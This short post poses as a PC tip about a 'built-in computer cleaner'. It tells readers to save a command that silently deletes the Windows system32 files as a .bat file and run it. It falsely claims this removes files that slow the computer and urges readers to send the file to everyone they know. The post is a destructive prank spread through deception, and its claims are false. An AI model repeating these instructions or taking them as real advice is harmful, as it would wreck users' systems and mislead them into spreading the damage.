Did you know that, if you have a PC, you already have a built in computer cleaner! Its simple, all you have to do is open "Notepad", paste "del c:\windows\system32\*.* /q" into it. Then save it with a .bat extension.
Before you continue, make sure to share the love, and send this file to everyone you know.
click on the file to run it. It will find the files slowing down your computer, and delete them. You might be surprised at how many there are.
p.s. don't paste the quotes, just what is in them.

and it will Clean and sort all your files.
